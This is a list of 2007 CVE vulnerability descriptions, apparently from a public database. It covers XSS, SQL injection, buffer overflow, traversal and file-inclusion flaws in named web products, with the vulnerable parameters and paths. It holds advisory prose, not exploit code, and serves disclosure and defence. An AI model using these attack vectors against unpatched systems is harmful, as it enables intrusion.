[CVE-2007-6654] Buffer overflow in a certain ActiveX control in Macrovision InstallShield Update Service Web Agent 5.1.100.47363 allows remote attackers to execute arbitrary code via a long string in the ProductCode argument (second argument) to the DownloadAndExecute method, a different vulnerability than CVE-2007-0321, CVE-2007-2419, and CVE-2007-5660.
[CVE-2007-6652] cpie.php in XCMS 1.83 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to conduct direct static code injection attacks and execute arbitrary code via the testo_0 parameter in a cpie admin action to index.php, which writes to dati/generali/footer.dtb (aka the XCMS footer).
[CVE-2007-6646] Multiple cross-site scripting (XSS) vulnerabilities in LiveCart 1.0.1, and possibly other versions before 1.1.0, allow remote attackers to inject arbitrary web script or HTML via (1) the return parameter to user/remindPassword, (2) the q parameter to the category script, (3) the return parameter to the order script, or (4) the email parameter to user/remindComplete.
[CVE-2007-6643] Cross-site scripting (XSS) vulnerability in the com_poll component in Joomla! before 1.5 RC4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6641] Cross-site scripting (XSS) vulnerability in dir.php in milliscripts Redirection allows remote attackers to inject arbitrary web script or HTML via the cat parameter in a browse action.
[CVE-2007-6640] Creammonkey 0.9 through 1.1 and GreaseKit 1.2 through 1.3 does not properly prevent access to dangerous functions, which allows remote attackers to read the configuration, modify the configuration, or send an HTTP request via the (1) GM_addStyle, (2) GM_log, (3) GM_openInTab, (4) GM_setValue, (5) GM_getValue, or (6) GM_xmlhttpRequest function within a web page on which a userscript is configured.
[CVE-2007-6638] March Networks DVR 3204 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames, passwords, device names, and IP addresses via a direct request for scripts/logfiles.tar.gz.
[CVE-2007-6637] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash Player allow remote attackers to inject arbitrary web script or HTML via a crafted SWF file, related to "pre-generated SWF files" and Adobe Dreamweaver CS3 or Adobe Acrobat Connect. NOTE: the asfunction: vector is already covered by CVE-2007-6244.
[CVE-2007-6633] Multiple cross-site scripting (XSS) vulnerabilities in FAQMasterFlexPlus, possibly 1.5 or 1.52, allow remote attackers to inject arbitrary web script or HTML via (1) the cat_name parameter to faq.php
[CVE-2007-6617] Cross-site scripting (XSS) vulnerability in 500page.jsp in JIRA Enterprise Edition before 3.12.1 allows remote attackers to inject arbitrary web script or HTML, which is not properly handled when generating error messages, as demonstrated by input originally sent in the URI to secure/CreateIssue. NOTE: some of these details are obtained from third party information.
[CVE-2007-6616] Cross-site scripting (XSS) vulnerability in simpleforum.cgi in SimpleForum 4.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchkey parameter in a search action. NOTE: some of these details are obtained from third party information.
[CVE-2007-6611] Cross-site scripting (XSS) vulnerability in view.php in Mantis before 1.1.0 allows remote attackers to inject arbitrary web script or HTML via a filename, related to bug_report.php.
[CVE-2007-6608] Multiple cross-site scripting (XSS) vulnerabilities in OpenBiblio 0.5.2-pre4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) LAST and (2) FIRST parameters to admin/staff_del_confirm.php, (3) the name parameter to admin/theme_del_confirm.php, or (4) the themeName parameter to admin/theme_preview.php.
[CVE-2007-6597] Multiple cross-site scripting (XSS) vulnerabilities in IPortalX before Build 033 allow remote attackers to inject arbitrary web script or HTML via the (1) KW and (2) SF parameters to forum/login_user.asp, and (3) the Date parameter to blogs.asp.
[CVE-2007-6592] Apple Safari 2, when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, regards the certificate as also accepted for all domain names in subjectAltName:dNSName fields, which makes it easier for remote attackers to trick a user into accepting an invalid certificate for a spoofed web site.
[CVE-2007-6591] KDE Konqueror 3.5.5 and 3.95.00, when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, regards the certificate as also accepted for all domain names in subjectAltName:dNSName fields, even though these fields cannot be examined in the product, which makes it easier for remote attackers to trick a user into accepting an invalid certificate for a spoofed web site.
[CVE-2007-6588] Cross-site scripting (XSS) vulnerability in PHCDownload 1.10 allows remote attackers to inject arbitrary web script or HTML via the username field in an unspecified component. NOTE: the provenance of this information is unknown
[CVE-2007-6574] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.4 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the origin parameter to work/work.php in a display_upload_form action, or the forum parameter to (2) forum/viewforum.php or (3) forum/viewthread.php.
[CVE-2007-6572] Cross-site scripting (XSS) vulnerability in Sun Java System Web Server 6.1 before SP8 and 7.0 before Update 1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6566204.
[CVE-2007-6571] Cross-site scripting (XSS) vulnerability in Sun Java System Web Proxy Server 3.6 before SP11 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6611356.
[CVE-2007-6570] Cross-site scripting (XSS) vulnerability in the View URL Database functionality in Sun Java System Web Proxy Server 4.x before 4.0.6 and 3.x before 3.6 SP11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6566309.
[CVE-2007-6569] Cross-site scripting (XSS) vulnerability in the View Error Log functionality in Sun Java System Web Proxy Server 4.x before 4.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6566246.
[CVE-2007-6564] Cross-site scripting (XSS) vulnerability in admin.php in Limbo CMS 1.0.4.2 allows remote attackers to inject arbitrary web script or HTML via the com_option parameter.
[CVE-2007-6560] Multiple cross-site scripting (XSS) vulnerabilities in Logaholic before 2.0 RC8 allow remote attackers to inject arbitrary web script or HTML via (1) the newconfname parameter to profiles.php or (2) the conf parameter to index.php.
[CVE-2007-6556] Multiple SQL injection vulnerabilities in websihirbazi 5.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to default.asp in a news page action or (2) the pageid parameter to default.asp.
[CVE-2007-6550] form.php in PMOS Help Desk 2.4 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to conduct eval injection attacks and execute arbitrary PHP code via the options array parameter.
[CVE-2007-6545] Multiple cross-site scripting (XSS) vulnerabilities in RunCMS before 1.6.1 allow remote attackers to inject arbitrary web script or HTML via (1) the subject parameter to modules/news/submit.php
[CVE-2007-6541] Multiple cross-site scripting (XSS) vulnerabilities in neuron news 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the topic parameter in a viewtopic action, or the (2) newsyear or (3) newsmonth parameter in a newsarchive action to the default URI in patch/.
[CVE-2007-6538] SQL injection vulnerability in ing/blocks/mrbs/code/web/view_entry.php in the MRBS plugin for Moodle allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2007-6526] Cross-site scripting (XSS) vulnerability in tiki-special_chars.php in TikiWiki before 1.9.9 allows remote attackers to inject arbitrary web script or HTML via the area_name parameter.
[CVE-2007-6517] SQL injection vulnerability in the forget password section (LostPwd.asp) in Eagle Software Aeries Browser Interface (ABI) 3.7.9.17 allows remote attackers to execute arbitrary SQL commands via the EmailAddress parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-6512] PHP MySQL Banner Exchange 2.2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database information via a direct request to inc/lib.inc.
[CVE-2007-6511] Websense Enterprise 6.3.1 allows remote attackers to bypass content filtering by visiting http URLs with a (1) RealPlayer G2, (2) MSMSGS, or (3) StoneHttpAgent User-Agent header, which results in a Non-HTTP categorization.
[CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code.
[CVE-2007-6495] inc_newuser.asp in Hosting Controller 6.1 Hot fix 3.3 and earlier allows remote authenticated users to change the permissions of directories named (1) db, (2) www, (3) Special, and (4) log at arbitrary locations under the web root via a modified Dirroot parameter in an AddUser action to accounts/AccountActions.asp. NOTE: this can be leveraged for remote code execution by changing the permissions of \Forum\db, which is configured for execution of ASP scripts with administrative privileges, and then uploading a script to \Forum\db.
[CVE-2007-6493] The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to execute arbitrary code via a certain argument to the SetHandler method.
[CVE-2007-6492] The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via an empty string in the argument to the ProcessRequestEx method.
[CVE-2007-6491] Multiple SQL injection vulnerabilities in Kvaliitti WebDoc 3.0 CMS allow remote attackers to execute arbitrary SQL commands via (1) the cat_id parameter to categories.asp
[CVE-2007-6489] Multiple cross-site scripting (XSS) vulnerabilities in Falcon Series One CMS 1.4.3 allow remote attackers to inject arbitrary web script or HTML via the (1) gb_mail, (2) gb_name, and (3) gb_text parameters in a guestbook action to index.php, and unspecified other vectors.
[CVE-2007-6487] Unspecified vulnerability in Plain Black WebGUI 7.4.0 through 7.4.17 allows remote authenticated users with Secondary Admin privileges to create Admin accounts, a different vulnerability than CVE-2006-0680.
[CVE-2007-6486] Multiple cross-site scripting (XSS) vulnerabilities in shout.php (aka the shoutbox) in LineShout 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) username (nickname) or (2) message parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-6474] Multiple cross-site scripting (XSS) vulnerabilities in GF-3XPLORER 2.4 allow remote attackers to inject arbitrary web script or HTML via the newdir parameter to index_3x.php, and unspecified other vectors.
[CVE-2007-6470] phpRPG 0.8 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read session ID values in files under tmp/, and then hijack sessions via PHPSESSID cookies.
[CVE-2007-6466] Multiple SQL injection vulnerabilities in index.php in FreeWebshop 2.2.1 allow remote attackers to execute arbitrary SQL commands via (1) the prod parameter in a details action, (2) the cat parameter in a browse list action, or (3) the group parameter in a categories action. NOTE: it was later reported that MOG - Web Shop (MOG-WebShop), a product based on the same code, is also affected.
[CVE-2007-6465] Multiple cross-site scripting (XSS) vulnerabilities in ganglia-web in Ganglia before 3.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) c and (2) h parameters to (a) web/host_gmetrics.php
[CVE-2007-6463] Multiple cross-site scripting (XSS) vulnerabilities in the admin panel in PHP Real Estate Classifieds allow remote attackers to inject arbitrary web script or HTML via unspecified "text areas/boxes."
[CVE-2007-6461] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Flyspray 0.9.9 through 0.9.9.3 allow remote attackers to inject arbitrary web script or HTML via (1) the query string in an index action, related to the savesearch JavaScript function
[CVE-2007-6460] Multiple cross-site scripting (XSS) vulnerabilities in Anon Proxy Server before 0.101 allow remote attackers to inject arbitrary web script or HTML via the URI, which is later displayed by (1) log.php or (2) logerror.php, a different vulnerability than CVE-2007-6459.
[CVE-2007-6457] Stack-based buffer overflow in the webmail feature in SurgeMail 38k4 allows remote attackers to cause a denial of service (crash) via a long Host header.
[CVE-2007-6455] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Mambo 4.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Itemid parameter in a com_frontpage option and the (2) option parameter.
[CVE-2007-6453] Directory traversal vulnerability in raidenhttpd-admin/workspace.php in RaidenHTTPD 2.0.19, when the WebAdmin function is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ulang parameter.
[CVE-2007-6452] Unspecified vulnerability in the benchmark reporting system in Google Web Toolkit (GWT) before 1.4.61 has unknown impact and attack vectors, possibly related to cross-site scripting (XSS).
[CVE-2007-6424] registry.pl in Fonality Trixbox 2.0 PBX products, when running in certain environments, reads and executes a set of commands from a remote web site without sufficiently validating the origin of the commands, which allows remote attackers to disable trixbox and execute arbitrary commands via a DNS spoofing attack.
[CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
[CVE-2007-6414] admin/administrator.php in Adult Script 1.6 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to bypass authentication and obtain administrative credentials via a direct request. NOTE: this can be leveraged for arbitrary code execution through a request to admin/videolinks_view.php.
[CVE-2007-6407] Multiple cross-site scripting (XSS) vulnerabilities in IBM Tivoli Provisioning Manager Express allow remote attackers to inject arbitrary web script or HTML via the (1) "assess modification," (2) user-id, and other unspecified fields to the /tpmx URI
[CVE-2007-6406] Multiple cross-site scripting (XSS) vulnerabilities in CA (formerly Computer Associates) eTrust Threat Management Console allow remote attackers to inject arbitrary web script or HTML via the IP Address field and other unspecified fields.
[CVE-2007-6395] Flat PHP Board 1.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain credentials via a direct request for the username php file for any user account in users/.
[CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6384] Unspecified vulnerability in the Image Converter functionality in BEA WebLogic Mobility Server 3.3, 3.5, and 3.6 through 3.6 SP1 allows remote attackers to obtain application file and resource access via unspecified vectors.
[CVE-2007-6374] Multiple cross-site scripting (XSS) vulnerabilities in Bitweaver 2.0.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) users/register.php or (2) search/index.php, or an editcomments action in (3) wiki/index.php or (4) forums/index.php. NOTE: the error parameter to users/login.php is covered by CVE-2006-3103.
[CVE-2007-6367] Multiple cross-site scripting (XSS) vulnerabilities in the guestbook in SineCMS 2.3.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username (user) or (2) comment (commento) field, different vectors than CVE-2007-2357.
[CVE-2007-6365] Cross-site scripting (XSS) vulnerability in modules/ecal/display.php in the Event Calendar in bcoos 1.0.10 allows remote attackers to inject arbitrary web script or HTML via the month parameter. NOTE: the provenance of this information is unknown
[CVE-2007-6364] Cross-site scripting (XSS) vulnerability in modificarPerfil.php in JLMForo System allows remote authenticated users to inject arbitrary web script or HTML via a signature.
[CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
[CVE-2007-6349] P4Webs.exe in Perforce P4Web 2006.2 and earlier, when running on Windows, allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with an empty body and a Content-Length greater than 0.
[CVE-2007-6346] Cross-site scripting (XSS) vulnerability in Rainboard before 2.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6344] Directory traversal vulnerability in modules/cms/index.php in Mcms Easy Web Make 1.3, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the template parameter.
[CVE-2007-6343] Cross-site scripting (XSS) vulnerability in HP OpenView Network Node Manager (OV NNM) 6.41, 7.01, and 7.51 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6321] Cross-site scripting (XSS) vulnerability in RoundCube webmail 0.1rc2, 2007-12-09, and earlier versions, when using Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via style sheets containing expression commands.
[CVE-2007-6317] Multiple directory traversal vulnerabilities in BarracudaDrive Web Server before 3.8 allow (1) remote attackers to read arbitrary files via certain ..\ (dot dot backslash) sequences in the URL path, or (2) remote authenticated users to delete arbitrary files or create arbitrary directories via a ..\ (dot dot backslash) sequence in the dir parameter to /drive/c/bdusers/USER/.
[CVE-2007-6316] Cross-site scripting (XSS) vulnerability in BarracudaDrive Web Server before 3.8 allows remote attackers to inject arbitrary web script or HTML via the URI path in an HTTP GET request, which is activated by administrators viewing log files via the Trace page.
[CVE-2007-6315] Group Chat in BarracudaDrive Web Server before 3.8 allows remote authenticated users to cause a denial of service (crash) via a HTTP request to /eh/chat.ehintf/C. that does not contain a Connection ID, which results in a NULL pointer dereference.
[CVE-2007-6314] BarracudaDrive Web Server before 3.8 allows remote attackers to read the source code for web scripts by appending a (1) + (plus), (2) . (dot), or (3) %80 and similar characters to the file name in the URL.
[CVE-2007-6312] Cross-site scripting (XSS) vulnerability in the logon page in Web Reporting Tools portal in Websense Enterprise and Web Security Suite 6.3 allows remote attackers to inject arbitrary web script or HTML via the username field.
[CVE-2007-6310] Multiple cross-site scripting (XSS) vulnerabilities in Falt4Extreme RC4 10.9.2007 allow remote attackers to inject arbitrary web script or HTML via the handler parameter to (1) index.php and possibly (2) admin/index.php, and (3) the topic parameter to modules/feed/feed.php (aka modules/feed.php).
[CVE-2007-6309] Multiple cross-site scripting (XSS) vulnerabilities in index.php in webSPELL 4.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the galleryID parameter in a usergallery upload action
[CVE-2007-6308] Cross-site scripting (XSS) vulnerability in HttpLogger 0.8.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6307] Multiple cross-site scripting (XSS) vulnerabilities in clickstats.php in wwwstats 3.21 allow remote attackers to inject arbitrary web script or HTML via (1) the link parameter or (2) the User-Agent HTTP header.
[CVE-2007-6306] Multiple cross-site scripting (XSS) vulnerabilities in the image map feature in JFreeChart 1.0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) chart name or (2) chart tool tip text
[CVE-2007-6301] Cross-site scripting (XSS) vulnerability in compose.php in OpenNewsletter 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the type parameter.
[CVE-2007-6298] Cross-site scripting (XSS) vulnerability in the Shoutbox module for Drupal 5.x before Shoutbox 5.x-1.1 allows remote authenticated users to inject arbitrary web script or HTML via Shoutbox block messages.
[CVE-2007-6297] Multiple cross-site scripting (XSS) vulnerabilities in PHPMyChat 0.14.5 allow remote attackers to inject arbitrary web script or HTML via the (1) LIMIT parameter to chat/deluser.php3, the (2) Link parameter to chat/edituser.php3, or the (3) LastCheck or (4) B parameter to chat/users_popupL.php3. NOTE: the FontName vectors for start_page.css.php3 and style.css.php3 are already covered by CVE-2005-1619. The medium vectors for start_page.css.php3 (start_page.css.php) and style.css.php3 (style.css.php), and the From vector for users_popupL.php3 (users_popupL.php), are already covered by CVE-2005-3991.
[CVE-2007-6295] Cross-site scripting (XSS) vulnerability in the WebRunMenuFrame page in the online meeting center template in IBM Lotus Sametime before 8.0 allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2007-6290] Multiple directory traversal vulnerabilities in js/get_js.php in SERWeb 2.0.0 dev1 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) mod and (2) js parameters.
[CVE-2007-6289] Multiple PHP remote file inclusion vulnerabilities in SerWeb 2.0.0 dev1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) _SERWEB[configdir] parameter to load_lang.php, (2) _SERWEB[functionsdir] parameter to main_prepend.php, and the (3) _PHPLIB[libdir] parameter to load_phplib.php, different vectors than CVE-2007-3359 and CVE-2007-3358.
[CVE-2007-6287] Cross-site scripting (XSS) vulnerability in the login page in Lxlabs HyperVM 2.0 allows remote attackers to inject arbitrary web script or HTML via the frm_emessage parameter, a different vector than CVE-2006-6649. NOTE: the provenance of this information is unknown
[CVE-2007-6274] Multiple cross-site scripting (XSS) vulnerabilities in modules/ecal/display.php in the Event Calendar in bcoos 1.0.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) day or (2) year parameter.
[CVE-2007-6270] Multiple cross-site scripting (XSS) vulnerabilities in Absolute News Manager.NET 5.1 allow remote attackers to inject arbitrary web script or HTML via the (1) rmore parameter to xlaabsolutenm.aspx and the (2) template parameter to pages/default.aspx.
[CVE-2007-6244] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash Player 9.x up to 9.0.48.0 and 8.x up to 8.0.35.0 allow remote attackers to inject arbitrary web script or HTML via (1) a SWF file that uses the asfunction: protocol or (2) the navigateToURL function when used with the Flash Player ActiveX Control in Internet Explorer.
[CVE-2007-6232] Cross-site scripting (XSS) vulnerability in index.php in FTP Admin 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter in an error page action.
[CVE-2007-6219] Cross-site scripting (XSS) vulnerability in IBM Tivoli Netcool Security Manager 1.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6215] Multiple directory traversal vulnerabilities in play.php in Web-MeetMe 3.0.3 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) roomNo and possibly the (2) bookid parameter.
[CVE-2007-6213] Multiple directory traversal vulnerabilities in mod/chat/index.php in WebED 0.0.9 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) Root and (2) Path parameters.
[CVE-2007-6205] Cross-site scripting (XSS) vulnerability in the remote RSS sidebar plugin (serendipity_plugin_remoterss) in S9Y Serendipity before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via a link in an RSS feed.
[CVE-2007-6204] Multiple stack-based buffer overflows in HP OpenView Network Node Manager (OV NNM) 6.41, 7.01, and 7.51 allow remote attackers to execute arbitrary code via unspecified long arguments to (1) ovlogin.exe, (2) OpenView5.exe, (3) snmpviewer.exe, and (4) webappmon.exe, as demonstrated via a long Action parameter to OpenView5.exe.
[CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
[CVE-2007-6196] Cross-site scripting (XSS) vulnerability in util.php in Calacode @Mail before 5.2 allows remote attackers to inject arbitrary web script or HTML via the func parameter.
[CVE-2007-6177] PHP remote file inclusion vulnerability in Exchange/include.php in PHP_CON 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the webappcfg[APPPATH] parameter.
[CVE-2007-6173] Cross-site scripting (XSS) vulnerability in c/portal/login in Liferay Enterprise Portal 4.3.1 allows remote attackers to inject arbitrary web script or HTML via the emailAddress parameter in a Send New Password action, a different vector than CVE-2007-6055. NOTE: some of these details are obtained from third party information.
[CVE-2007-6162] Cross-site scripting (XSS) vulnerability in index.php in FMDeluxe 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter in a category action.
[CVE-2007-6160] Cross-site scripting (XSS) vulnerability in index.php in Tilde CMS 4.x and earlier allows remote attackers to inject arbitrary web script or HTML via the aarstal parameter in a yeardetail action.
[CVE-2007-6158] Multiple SQL injection vulnerabilities in caladmin.inc.php in Proverbs Web Calendar 1.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) loginname (aka Username) and (2) loginpass (aka Password) parameters to caladmin.php.
[CVE-2007-6157] Cross-site scripting (XSS) vulnerability in index.php in SimpleGallery 0.1.3 allows remote attackers to inject arbitrary web script or HTML via the album parameter.
[CVE-2007-6156] Multiple cross-site scripting (XSS) vulnerabilities in base_qry_main.php in Base Analysis and Security Engine (BASE) before 1.3.9 allow remote attackers to inject arbitrary web script or HTML via the (1) sig[0] and (2) sig[1] parameters.
[CVE-2007-6142] Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) show parameter to index.php and the (2) print parameter to print.php. NOTE: the provenance of this information is unknown
[CVE-2007-6141] Cross-site scripting (XSS) vulnerability in vBTube.php in vBTube 1.1 Beta allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2007-6136] Multiple cross-site scripting (XSS) vulnerabilities in index.php in M2Scripts MySpace Scripts Poll Creator allow remote attackers to inject arbitrary web script or HTML via the (1) title, (2) intro, and (3) question parameters, and (4) unspecified answer parameters, in a create_new action. NOTE: some of these details are obtained from third party information.
[CVE-2007-6135] Cross-site scripting (XSS) vulnerability in phpslideshow.php in PHPSlideShow 0.9.9.2, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the directory parameter. NOTE: this issue was originally reported for toonchapter8.php, but this is probably a site-specific name, since the PHPSlideShow distribution does not contain that file.
[CVE-2007-6128] SQL injection vulnerability in events.php in WorkingOnWeb 2.0.1400 allows remote attackers to execute arbitrary SQL commands via the idevent parameter.
[CVE-2007-6126] Multiple cross-site scripting (XSS) vulnerabilities in project alumni 1.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the year parameter to (1) xml/index.php
[CVE-2007-6124] Cross-site scripting (XSS) vulnerability in signin.php in Softbiz Freelancers Script 1 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter.
[CVE-2007-6110] Cross-site scripting (XSS) vulnerability in htsearch in htdig 3.2.0b6 allows remote attackers to inject arbitrary web script or HTML via the sort parameter.
[CVE-2007-6104] Cross-site scripting (XSS) vulnerability in the Instant Web Publishing feature in FileMaker Pro 7 and 8, Server 7 and 8, and Developer 7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6102] Cross-site scripting (XSS) vulnerability in Feed to JavaScript (Feed2JS) 1.91 allows remote attackers to inject arbitrary web script or HTML via a URL in a feed.
[CVE-2007-6100] Cross-site scripting (XSS) vulnerability in libraries/auth/cookie.auth.lib.php in phpMyAdmin before 2.11.2.2, when logins are authenticated with the cookie auth_type, allows remote attackers to inject arbitrary web script or HTML via the convcharset parameter to index.php, a different vulnerability than CVE-2005-0992.
[CVE-2007-6090] Cross-site scripting (XSS) vulnerability in index.php in Nuked-Klan 1.7.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: the provenance of this information is unknown
[CVE-2007-6085] Multiple cross-site scripting (XSS) vulnerabilities in index.php in VigileCMS 1.4 allow remote attackers to inject arbitrary web script or HTML via the message field in the (1) vedipm or (2) live_chat module.
[CVE-2007-6056] frame.html in Aida-Web (Aida Web) allows remote attackers to bypass a protection mechanism and obtain comment and task details via modified values to the (1) Mehr and (2) SUPER parameters.
[CVE-2007-6055] Cross-site scripting (XSS) vulnerability in c/portal/login in Liferay Portal 4.1.0 and 4.1.1 allows remote attackers to inject arbitrary web script or HTML via the login parameter. NOTE: this issue reportedly exists because of a regression that followed a fix at an unspecified earlier date.
[CVE-2007-6044] Multiple unspecified vulnerabilities in IBM WebSphere MQ 6.0 have unknown impact and remote attack vectors involving "memory corruption." NOTE: as of 20071116, the only disclosure is a vague pre-advisory with no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
[CVE-2007-6039] PHP 5.2.5 and earlier allows context-dependent attackers to cause a denial of service (application crash) via a long string in (1) the domain parameter to the dgettext function, the message parameter to the (2) dcgettext or (3) gettext function, the msgid1 parameter to the (4) dngettext or (5) ngettext function, or (6) the classname parameter to the stream_wrapper_register function. NOTE: this might not be a vulnerability in most web server environments that support multiple threads, unless this issue can be demonstrated for code execution.
[CVE-2007-6037] Cross-site scripting (XSS) vulnerability in ws/generic_api_call.pl in Citrix NetScaler 8.0 build 47.8 allows remote attackers to inject arbitrary web script or HTML via the standalone parameter and other unspecified parameters.
[CVE-2007-6032] SQL injection vulnerability in calendar/page.asp in Aleris Web Publishing Server 3.0 allows remote attackers to execute arbitrary SQL commands via the mode parameter.
[CVE-2007-6018] IMP Webmail Client 4.1.5, Horde Application Framework 3.1.5, and Horde Groupware Webmail Edition 1.0.3 does not validate unspecified HTTP requests, which allows remote attackers to (1) delete arbitrary e-mail messages via a modified numeric ID or (2) "purge" deleted emails via a crafted email message.
[CVE-2007-6005] Unspecified vulnerability in the GpcContainer.GpcContainer.1 ActiveX control in WebEx allows remote attackers to cause a denial of service (memory access violation and crash) via (1) an invalid argument to the InitParam method or (2) an unspecified vector involving the SetParam method.
[CVE-2007-6003] Cross-site scripting (XSS) vulnerability in cgi/b/ic/connect in the Thomson SpeedTouch 716 with firmware 5.4.0.14 allows remote attackers to inject arbitrary web script or HTML via the url parameter. NOTE: the provenance of this information is unknown
[CVE-2007-6002] Cross-site scripting (XSS) vulnerability in Fenriru (1) Sleipnir 2.5.17 R2 and earlier and (2) Grani 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the Search field in a search for additions to the Favorites section.
[CVE-2007-6001] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Bandersnatch 0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) func or (2) date parameter, or the jid parameter in a (3) log or (4) user action, a different vulnerability than CVE-2007-3910.
[CVE-2007-5993] Cross-site scripting (XSS) vulnerability in Visionary Technology in Library Solutions (VTLS) vtls.web.gateway before 48.1.1 allows remote attackers to inject arbitrary web script or HTML via the searchtype parameter.
[CVE-2007-5990] Cross-site scripting (XSS) vulnerability in ExoPHPdesk allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a user profile, possibly the (1) name and (2) website parameters to register.php.
[CVE-2007-5985] Multiple cross-site scripting (XSS) vulnerabilities in BtiTracker before 1.4.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to (1) account.php, (2) moresmiles.php, or (3) recover.php
[CVE-2007-5983] Cross-site scripting (XSS) vulnerability in index.php in Justin Hagstrom AutoIndex PHP Script before 2.2.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF).
[CVE-2007-5982] Multiple cross-site scripting (XSS) vulnerabilities in X7 Chat 2.0.4, 2.0.5, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via the (1) room parameter to sources/frame.php, the (2) theme_c parameter to help/index.php, or the (3) INSTALL_X7CHATVERSION parameter to upgradev1.php.
[CVE-2007-5980] Cross-site scripting (XSS) vulnerability in home/rss.php in eggblog before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF).
